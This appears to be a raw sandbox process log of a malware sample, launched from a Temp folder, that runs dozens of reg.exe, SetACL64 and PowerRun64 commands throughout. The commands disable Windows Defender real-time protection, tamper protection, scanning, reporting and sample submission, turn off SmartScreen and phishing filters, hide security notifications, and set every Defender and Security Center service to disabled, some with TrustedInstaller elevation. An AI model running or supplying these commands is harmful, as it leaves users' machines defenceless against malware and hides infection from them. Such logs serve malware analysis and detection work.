C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe

SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

